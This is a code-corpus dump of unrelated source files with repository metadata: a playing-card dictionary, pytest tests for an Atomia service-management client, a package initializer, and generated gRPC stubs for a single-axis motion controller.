python/trump.py
|
flaireclair/AIPoker
|
519cff95ee36333f580d273c569c840fb8920ac2
|
[
"MIT"
] | 1
|
2020-02-04T14:22:33.000Z
|
2020-02-04T14:22:33.000Z
|
python/trump.py
|
flaireclair/AIPoker
|
519cff95ee36333f580d273c569c840fb8920ac2
|
[
"MIT"
] | null | null | null |
python/trump.py
|
flaireclair/AIPoker
|
519cff95ee36333f580d273c569c840fb8920ac2
|
[
"MIT"
] | null | null | null |
cards = {'SPADE' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'],
'HEART' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'],
'CLUB' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'],
'DIAMOND' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
}
| 61.833333
| 90
| 0.253369
| 57
| 371
| 1.649123
| 0.315789
| 0.085106
| 0.12766
| 0.170213
| 0.723404
| 0.723404
| 0.723404
| 0.723404
| 0.723404
| 0.723404
| 0
| 0.25
| 0.266846
| 371
| 5
| 91
| 74.2
| 0.095588
| 0
| 0
| 0
| 0
| 0
| 0.239892
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
88863a5400b019d5bbed2e5dc5f0efb6df17ae7e
| 17,710
|
py
|
Python
|
atomia_manager/atomia_tests.py
|
stefan-stankovic-atomia/AutomationServerManager
|
0f28941401d3c042ff928ec38428838a2fa7400f
|
[
"ISC"
] | null | null | null |
atomia_manager/atomia_tests.py
|
stefan-stankovic-atomia/AutomationServerManager
|
0f28941401d3c042ff928ec38428838a2fa7400f
|
[
"ISC"
] | null | null | null |
atomia_manager/atomia_tests.py
|
stefan-stankovic-atomia/AutomationServerManager
|
0f28941401d3c042ff928ec38428838a2fa7400f
|
[
"ISC"
] | null | null | null |
from atomia_entities import AtomiaService
import atomia
import pytest
import urllib2
class ArgumentsMock(object):
def __init__(self, username = None, password = None, url = None, entity = None, action = None, account = None, service = None, parent = None, path = None, servicedata = None, query = None):
self.username = username
self.password = password
self.url = url
self.entity = entity
self.action = action
self.account = account
self.service = service
self.parent = parent
self.path = path
self.servicedata = servicedata
self.query = query
# show service
def test_show_no_service():
mock = ArgumentsMock(entity="service", action = "show")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_non_existing_service_id():
mock = ArgumentsMock(entity="service", action = "show", service = "00000000-0000-0000-0000-000000000000")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_existing_service_id():
mock = ArgumentsMock(entity="service", action = "show", service = "4fe9b823-0020-4e33-abd9-a2de6a1480af", account="101321")
assert isinstance(atomia.main(mock), AtomiaService)
def test_show_non_existing_service_description():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"CsBase\" : {\"foo\" : \"bar\"}} ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_non_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : { \"foo\" : \"bar\" } } ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_existing_service_description():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"DomainRegContact\" : {\"Id\" : \"138\"}} ]", account="101321")
assert isinstance(atomia.main(mock), AtomiaService)
def test_show_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : \"584e20b8-756f-49e4-b426-a58b835a873e\"} ]", account="101321")
assert isinstance(atomia.main(mock), AtomiaService)
# list service
def test_list_no_service():
mock = ArgumentsMock(entity="service", action = "list", account="101321")
assert isinstance(atomia.main(mock), list)
def test_list_non_existing_service_id():
mock = ArgumentsMock(entity="service", action = "list", parent = "00000000-0000-0000-0000-000000000000")
with pytest.raises(Exception):
atomia.main(mock)
def test_list_existing_service_id():
mock = ArgumentsMock(entity="service", action = "list", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", account="101321")
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_list_non_existing_service_description():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : {\"foo\" : \"bar\"}} ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_list_non_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : { \"foo\" : \"bar\" } } ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_list_existing_service_description():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsWindowsWebsite\" : {\"Hostname\":\"python43.org\"} } ]", account="101321")
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_list_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : \"584e20b8-756f-49e4-b426-a58b835a873e\"} ]", account="101321")
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
# find service
def test_find_no_service():
mock = ArgumentsMock(entity="service", action = "find", account="101321")
with pytest.raises(atomia.InputError):
atomia.main(mock)
def test_find_non_existing_parent_service_id():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "00000000-0000-0000-0000-000000000000", query = "{ \"name\" : \"CsLinuxWebsite\" }" )
with pytest.raises(Exception):
atomia.main(mock)
def test_find_existing_parent_service_id():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"CsLinuxWebsite\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_existing_parent_service_id_with_relative_path():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"ApacheWebSite\", \"path\" : \"CsLinuxWebsite\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_existing_parent_service_id_with_invalid_relative_path():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"ApacheWebSite\", \"path\" : \"foo\" }" )
with pytest.raises(Exception):
atomia.main(mock)
def test_find_existing_parent_service_id_with_relative_path_and_properties():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"ApacheWebSite\", \"path\" : \"CsLinuxWebsite\", \"properties\" : { \"PhpVersion\" : \"5.2\"} }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_existing_parent_service_locator_with_multiple_parents():
mock = ArgumentsMock(entity="service", action = "find", account="101321", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\"}, {\"CsWindowsWebsite\" : { \"InitEmail\" : \"true\"}}]", query = "{ \"name\" : \"DnsZoneRecord\", \"path\" : \"DnsZone\" }" )
with pytest.raises(Exception):
atomia.main(mock)
def test_find_existing_parent_service_locator():
mock = ArgumentsMock(entity="service", action = "find", account="101321", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\"}, {\"CsWindowsWebsite\" : { \"Hostname\" : \"python44.org\"}}]", query = "{ \"name\" : \"DnsZoneRecord\", \"path\" : \"DnsZone\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_no_parent():
mock = ArgumentsMock(entity="service", action = "find", account="101321", query = "{ \"name\" : \"DnsZoneRecord\", \"path\" : \"CsBase/CsWindowsWebsite/DnsZone\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_no_parent_root_service():
mock = ArgumentsMock(entity="service", action = "find", account="101321", query = "{ \"name\" : \"CsBase\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
# add service
def test_add_no_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321")
with pytest.raises(atomia.InputError):
atomia.main(mock)
def test_add_missing_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
def test_add_no_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result = atomia.main(mock)
assert isinstance(result, AtomiaService)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result.logical_id)
atomia.main(mock)
def test_add_with_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy46\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
result = atomia.main(mock)
assert isinstance(result, AtomiaService)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_add_with_parent_service_and_invalid_name():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase \", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_add_with_parent_service_and_invalid_property():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseMame\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_add_with_parent_service_and_missing_properties():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\" }")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
# delete service
def test_delete_no_service():
mock = ArgumentsMock(entity="service", action = "delete", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_delete_invalid_service_id():
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = "00000000-0000-0000-0000-000000000000")
with pytest.raises(Exception):
atomia.main(mock)
def test_delete_non_existing_service_locator_path():
mock = ArgumentsMock(entity="service", action = "delete", account="101321", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\"}, {\"CsMySqlDatabase\" : { \"DatabaseName\" : \"python44.org\"}}]")
with pytest.raises(Exception):
atomia.main(mock)
def test_delete_service_id():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
add_result = atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = add_result.logical_id)
assert atomia.main(mock)
def test_delete_service_locator():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
add_result_parent = atomia.main(mock)
if (isinstance(add_result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = add_result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if (isinstance(add_result, AtomiaService)):
delete_mock = ArgumentsMock(entity="service", action = "delete", account="101321", path="[{\"CsDatabase\" : \"" + add_result_parent.logical_id + "\"}, { \"CsMySqlDatabase\" : { \"DatabaseName\" : \"testpy45\"} } ]")
assert atomia.main(delete_mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = add_result_parent.logical_id)
atomia.main(mock)
else:
assert False
else:
assert False
# modify service
def test_modify_no_service():
mock = ArgumentsMock(entity="service", action = "modify", account="101321")
with pytest.raises(atomia.InputError):
atomia.main(mock)
def test_modify_missing_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"Collation\" : \"utf8_unicode_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
def test_modify_with_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if isinstance(add_result, AtomiaService):
modify_result = ArgumentsMock(entity="service", action = "modify", account="101321", service = add_result.logical_id, servicedata = "{ \"properties\" : { \"Collation\" : \"utf8_unicode_ci\"}}")
assert isinstance(atomia.main(modify_result), AtomiaService)
else:
assert False
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_modify_with_parent_service_and_invalid_property():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if isinstance(add_result, AtomiaService):
modify_result = ArgumentsMock(entity="service", action = "modify", account="101321", service = add_result.logical_id, servicedata = "{ \"properties\" : { \"Colation\" : \"utf8_unicode_ci\"}}")
with pytest.raises(Exception):
atomia.main(modify_result)
else:
assert False
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_modify_with_parent_service_and_missing_properties():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if isinstance(add_result, AtomiaService):
modify_result = ArgumentsMock(entity="service", action = "modify", account="101321", service = add_result.logical_id)
with pytest.raises(Exception):
atomia.main(modify_result)
else:
assert False
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
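The modify tests above repeat the same add-parent / add-child / delete-parent scaffolding. A minimal sketch of how that setup and teardown could be factored into a pytest fixture is shown below; it assumes the same ArgumentsMock, atomia and AtomiaService helpers already imported by this test module, and the "101321" account and service payloads are just the placeholder values used above.
# Hypothetical refactor of the repeated setup/teardown above into a pytest
# fixture; ArgumentsMock, atomia and AtomiaService are the helpers already
# used by this test module, and "101321" is the same placeholder account.
import pytest


@pytest.fixture
def parent_service():
    add_mock = ArgumentsMock(entity="service", action="add", account="101321",
                             servicedata='{ "name" : "CsDatabase" }')
    parent = atomia.main(add_mock)
    assert isinstance(parent, AtomiaService)
    yield parent
    # Teardown runs even if the test body fails, unlike the inline deletes above.
    delete_mock = ArgumentsMock(entity="service", action="delete",
                                account="101321", service=parent.logical_id)
    atomia.main(delete_mock)


def test_modify_collation_with_fixture(parent_service):
    add_mock = ArgumentsMock(
        entity="service", action="add", account="101321",
        parent=parent_service.logical_id,
        servicedata='{ "name" : "CsMySqlDatabase", "properties" : '
                    '{ "DatabaseName" : "testpy45", "CharacterSet" : "utf8", '
                    '"Collation" : "utf8_general_ci" } }')
    child = atomia.main(add_mock)
    assert isinstance(child, AtomiaService)
    modify_mock = ArgumentsMock(
        entity="service", action="modify", account="101321",
        service=child.logical_id,
        servicedata='{ "properties" : { "Collation" : "utf8_unicode_ci" } }')
    assert isinstance(atomia.main(modify_mock), AtomiaService)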
| 56.401274
| 289
| 0.659797
| 1,870
| 17,710
| 6.080749
| 0.061497
| 0.063319
| 0.083722
| 0.177293
| 0.910826
| 0.899745
| 0.881717
| 0.857884
| 0.848914
| 0.817958
| 0
| 0.060902
| 0.17205
| 17,710
| 313
| 290
| 56.58147
| 0.714588
| 0.004574
| 0
| 0.563265
| 0
| 0
| 0.1312
| 0.022018
| 0
| 0
| 0
| 0
| 0.122449
| 1
| 0.171429
| false
| 0.008163
| 0.016327
| 0
| 0.191837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee10413220c86229194a1f3df1dea68609b745b2
| 99
|
py
|
Python
|
service/models/common/__init__.py
|
CyberArkForTheCommunity/jobli-backend
|
2309c9ac33993cb89a8e1581630d99b46f8d55aa
|
[
"MIT"
] | null | null | null |
service/models/common/__init__.py
|
CyberArkForTheCommunity/jobli-backend
|
2309c9ac33993cb89a8e1581630d99b46f8d55aa
|
[
"MIT"
] | 1
|
2021-12-23T13:36:43.000Z
|
2021-12-23T13:36:43.000Z
|
service/models/common/__init__.py
|
CyberArkForTheCommunity/jobli-backend
|
2309c9ac33993cb89a8e1581630d99b46f8d55aa
|
[
"MIT"
] | null | null | null |
from service.models.common.address import Address
from service.models.common.answer import Answer
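A brief usage note: because this initializer re-exports the model classes, consumers can import them from the package root rather than from the individual modules.
# Equivalent, thanks to the re-exports above:
from service.models.common import Address, Answer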
| 24.75
| 49
| 0.848485
| 14
| 99
| 6
| 0.5
| 0.261905
| 0.404762
| 0.547619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 99
| 3
| 50
| 33
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ee1aa7bd1c83dd1089c336b4403b8e87e7875edb
| 8,986
|
py
|
Python
|
instrosetta/interfaces/motion_control/singleaxis_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/motion_control/singleaxis_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/motion_control/singleaxis_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from instrosetta.interfaces.motion_control import singleaxis_pb2 as instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2
class SingleAxisStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ScanDevices = channel.unary_stream(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/ScanDevices',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesResponse.FromString,
)
self.Initialize = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/Initialize',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeResponse.FromString,
)
self.Shutdown = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/Shutdown',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownResponse.FromString,
)
self.HomeMotor = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/HomeMotor',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.HomeMotorRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
self.GetRange = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/GetRange',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetRangeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.StageRange.FromString,
)
self.GetPosition = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/GetPosition',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetPositionRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
self.MoveAbsolute = channel.unary_stream(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/MoveAbsolute',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveAbsoluteRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
self.MoveRelative = channel.unary_stream(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/MoveRelative',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveRelativeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
class SingleAxisServicer(object):
# missing associated documentation comment in .proto file
pass
def ScanDevices(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Initialize(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Shutdown(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HomeMotor(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetRange(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetPosition(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MoveAbsolute(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MoveRelative(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SingleAxisServicer_to_server(servicer, server):
rpc_method_handlers = {
'ScanDevices': grpc.unary_stream_rpc_method_handler(
servicer.ScanDevices,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesResponse.SerializeToString,
),
'Initialize': grpc.unary_unary_rpc_method_handler(
servicer.Initialize,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeResponse.SerializeToString,
),
'Shutdown': grpc.unary_unary_rpc_method_handler(
servicer.Shutdown,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownResponse.SerializeToString,
),
'HomeMotor': grpc.unary_unary_rpc_method_handler(
servicer.HomeMotor,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.HomeMotorRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
'GetRange': grpc.unary_unary_rpc_method_handler(
servicer.GetRange,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetRangeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.StageRange.SerializeToString,
),
'GetPosition': grpc.unary_unary_rpc_method_handler(
servicer.GetPosition,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetPositionRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
'MoveAbsolute': grpc.unary_stream_rpc_method_handler(
servicer.MoveAbsolute,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveAbsoluteRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
'MoveRelative': grpc.unary_stream_rpc_method_handler(
servicer.MoveRelative,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveRelativeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
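For orientation, the sketch below shows how the generated bindings above are typically wired up: a servicer subclass registered on a grpc server, and a client stub created from a channel. The address, thread-pool size and the MySingleAxis override are illustrative assumptions; the message classes (GetPositionRequest, Position) come from the singleaxis_pb2 module referenced by the serializers above.
# Hypothetical wiring for the generated SingleAxis bindings above; the address,
# executor size and the MySingleAxis implementation are placeholders.
from concurrent import futures

import grpc

from instrosetta.interfaces.motion_control import singleaxis_pb2
from instrosetta.interfaces.motion_control import singleaxis_pb2_grpc


class MySingleAxis(singleaxis_pb2_grpc.SingleAxisServicer):
    def GetPosition(self, request, context):
        # Return an (empty) Position message; the other RPCs keep the
        # UNIMPLEMENTED default from the base servicer.
        return singleaxis_pb2.Position()


def serve(address="[::]:50051"):
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
    singleaxis_pb2_grpc.add_SingleAxisServicer_to_server(MySingleAxis(), server)
    server.add_insecure_port(address)
    server.start()
    return server


def query_position(address="localhost:50051"):
    with grpc.insecure_channel(address) as channel:
        stub = singleaxis_pb2_grpc.SingleAxisStub(channel)
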